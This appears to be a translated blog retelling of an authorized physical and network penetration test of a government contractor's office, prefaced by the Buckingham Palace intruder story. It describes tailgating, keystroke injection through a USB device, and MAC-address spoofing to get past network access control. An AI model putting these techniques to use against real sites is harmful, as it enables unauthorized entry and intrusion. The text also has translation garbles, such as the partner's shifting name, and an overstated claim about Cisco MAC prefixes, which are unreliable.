“I noticed that it’s open.” How do pentests of companies take place?

history about the person companies hire to see if they have security holes. His main task is to find a loophole and penetrate through it into the building or infrastructure of the company.

But first, a lyrical introduction about Michael Fagan and his amazing story of the Buckingham Palace break-ins. It happened in 1982 in London. The first time Michael entered the palace was through a drainpipe through an open window. The man walked around the palace for almost an hour and looked at the paintings on the walls. And what about the security service? None of them noticed the uninvited guest. Michael even went into the office of Charles’ personal secretary and drank about half the bottle of wine he found there.

The story seems incredible, the man easily entered the royal palace, drank the royal wine and, as if nothing had happened, left the building without even getting caught by the guards. But Michael’s story didn’t end there. After some time, he was walking through the streets of London early in the morning and the desire to get to the palace again appeared in his head. Michael greeted the cleaners, who were hurrying to work, and went with them to the palace. Miraculously, the man found the queen’s room. Michael decided to make sure he was exactly in the royal chambers, so he pulled back the curtain to get a better view of the queen. Suddenly, the queen woke up and asked what the man was doing in her chambers, after which she kicked out the uninvited guest.

Just imagine, a man snuck into Buckingham Palace twice, the second time he snuck into the Queen’s bedroom while she was sleeping, and he was charged only for stealing half a bottle of wine. The jury found him not guilty of the offense and he was not sentenced to prison.

The story of another pentester

The introductory part is over. Let’s move on to another pentester. The hero of the story is Jeremy Rowe, a solution architect for Synack. Companies hire him to see if they have security holes and if he can find them. Even as a child, Jeremy loved to create small websites – this is how his technical career began. After the army, Jeremy took a job at the Geek Squad, where he was troubleshooting clients’ computers. He then decided to find another job, started studying technology, eventually getting into cybersecurity and becoming OSCP certified. After that, he was hired by an organization that worked for the government. Jeremy’s tasks included network level penetration testing and web application penetration testing, and he also tried to find vulnerabilities in buildings.

Since the organization interacted with the government, attackers could attack it to gain access to government networks. Jeremy knew this, and so he wanted to check one of the government contractor’s remote offices and try to find loopholes through which attackers could attack. But the company’s management was against it, and Jeremy had to convince them of the importance of testing. The argument was that pentesters are thinking through scenarios according to which attackers can potentially attack. So Jeremy Rowe got the green light from the Pentest management. “The best defense is a good attack,” the hero of the story believed.

The organization allowed to try to penetrate the remote office physically and through the network, but with some conditions. Jeremy was banned from installing backdoors or malware on physical devices. They didn’t want him to install “hacking tools” on a network that was in active use.

Jeremy and his team began to come up with a plan to check out the office. As a result of testing, they wanted to get answers to the questions:

  • Under what scenarios can hackers attack an organization?

  • Can I access devices and the corporate network?

  • Can information be obtained that potentially compromises government networks?

Jeremy wanted to pentest like he was an attacker attacking government networks. Although he worked for the company, he had never been to the test site before and had no intention of using internal resources to get information.

Plan A and B

So Jeremy started by googling the location of the office. So he received information about what surrounds the building, whether coffee houses are attached to it, how many entrances, etc. Then he drove there by car to observe the situation around and study the area in detail.

On the Darknet Diaries podcast, Jeremy Rowe revealed that he had two plans for what would happen next. Plan A was to walk around the perimeter of the building and check which doors were open. It was a good plan, because often the main entrance is where all the guards are, and by slipping through the side or back door, you can avoid meeting with her. Plan B was to enter the office through the main entrance. Jeremy and his team did not know what was inside the office building, they only assumed that there might be a lobby on the ground floor.

It’s time to move out

Jeremy worked with a partner (BC). On the eve of the pentest, they cut their hair and dressed to blend in with the office staff. Jeremy and VS took with them laptops, a set of lockpicks, Bash Bunny, etc. Jeremy also installed a mobile version of Kali Linux on his phone.

On Day X, Jeremy and VS parked the car in the office parking lot, which turned out to be free to enter. They decided to go around the perimeter of the building and check the doors. It turned out that one door was ajar due to a technical malfunction. So Jeremy and Sun ended up in the stairwell. The pentesters decided not to check the first floor, because their contractor’s offices were on the second and third. The door on the second floor, to their surprise, turned out to be open, they got into the office of the organization, took pictures there and returned back to the stairs. The door on the third floor was also unlocked.

After the success of plan A, the heroes of the story decided to check whether it was also possible to freely enter the building through the main entrance. Jeremy assumed that there must be an obstacle in their way that would not allow them to freely enter the office. They entered the building through the main entrance and walked freely to the stairs and elevators that led to the upper floors.

On the floors with the contractor’s offices there were seating areas with sofas – that’s where Jeremy and his partner decided to settle down. It turned out that getting into the offices of the organization is possible only with a key card, which employees have. The pentesters turned on their laptops, began to think about what to do next, and at the same time watched the situation around them. In the lounge with sofas, Jeremy noticed a small computer (infokiosk), he seemed curious that this computer was left unattended.

It turned out that the computer was running software that allowed employees to enter only one application. On the back of the infokiosk was a USB port through which Jeremy was connected to Bash Bunny. On the Darknet Diaries podcast, Jeremy Rowe explained that the Bash Bunny looks like a normal flash drive, but when plugged into a computer, it treats the Bash Bunny like a keyboard. If you pre-register Bash Bunny with an action script, then the PC will think that a keyboard has been connected to it and will start accepting keystrokes. Jeremy pre-scripted the script for the computer to open Word and start typing on the screen. This was enough for the pentester to take a photo and prove to management that he was in control of this computer.

After that, Jeremy and VS decided to walk around the office one more time and check if all the doors were closed and that they could only be accessed with a key card. But for some reason, on this particular day, some doors were open.

In total, Jeremy and BC got into the office through the main entrance, climbed the stairs, pulled the handle and just entered the office, where there is a lot of corporate information around. In the same place, they noticed network ports, printers, projects that employees were working on, they also saw what was written on the boards, they saw labels and different IP addresses.

Jeremy and his partner moved freely around the office, while they did not have badges and passes. They passed by a large number of employees and greeted them. At some point, the pentesters even went up to the employee lounge and drank coffee.

While pentesters were walking around the office, they noticed an open meeting room with several Ethernet connectors on the walls. Jeremy and BC just had cables to connect with them. Jeremy saw that there was a Wi-Fi network in this place, and although he did not know the password, he did not need it, because they connected to it via the Ethernet connector. In the podcast, Jeremy explained that Ethernet ports can be configured in many ways. They may give internal access, or they may not give access at all. It is not a fact that just because you are physically in the office, you will be able to connect and use the network. In a properly configured office, you can’t just walk up and connect to any Ethernet port. But they connected their computers to the Ethernet connectors and saw that the ports were “alive”.

Jeremy decided to check what was on this network, but there were no other computers on the network. All he could do was access the Internet. Jeremy deduced that this company was using NAC, so when he connected a computer to the port, the router checked its MAC address and determined that this computer should not have extended access. Jeremy decided to try getting extended access rather than guest access. He wanted to find the MAC address that is on the allowed list and change his computer’s MAC address to one of them. He noticed several printers in the office. In the podcast, he explained that the first part of the MAC address is from the vendor, so if the company has Cisco equipment, then every single Ethernet port on all Cisco equipment starts with a MAC address of 94:36:CC. And the second half of the MAC address will be different for each Ethernet port, which will make them different.

Jeremy looked at what types of printers the organization had and looked at where that vendor’s MAC address started, and then changed the MAC address on his computer to match the one the printer started with. Then he tried to reconnect the ethernet cable and see if he gets a different IP address. It worked and Jeremy got extended access inside the network. Another goal was achieved – they got access to the network.

After that, the pentesters disconnected from the network and decided to once again walk around the office to look for some vulnerability that they might have missed. As they walked, they noticed that a lot of employees move away from their laptops and do not block the session. Jeremy and his partner took several photos of them sitting at such laptops. So they demonstrated to the management that the PCs are unlocked and you can do anything with them.

Then the pentesters went to the elevator, in which one of the contractor’s workers was riding. In the elevator, they greeted him and exchanged a few meaningless phrases. Jeremy decided to improvise to follow this employee, so he went out with him on the same floor. The employee went to the door, took out a pass and held the door open for Jeremy. He thanked the employee and entered the office. Jeremy saw that his partner had remained in the lobby, so he decided to go around the other doors to let him in, but when he turned the corner, his partner was already in the office. It turned out that the other doors did not require a pass. This was another conclusion for the report.

While the pentesters were on the third floor, they focused on gathering intelligence. They were wondering if there is access to some programs that should not be accessed. As they walked around the office, they took pictures of whiteboards, documents on desks, files, filenames. They wanted to get as much information as possible about the organization and who owns these files and how confidential they are to the organization. Jeremy and BC gathered enough information for the report and left the contractor’s office through the building’s main door.

And what is the result?

Jeremy was able to play out scenarios where would-be attackers could easily gain unfettered access to the organization. In the podcast, Jeremy said that management had a hard time accepting this fact. They were surprised at how easily Jeremy gained control of the information kiosk in the lobby. Also, the management was shocked that the employees, moving away from the computers, leave them on.

What did management do after the fact? Jeremy said that they closed the doors and simply removed the computer from the lobby. The organization was impressed with the work of Jeremy and his partner, so they were allowed to conduct additional security testing.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *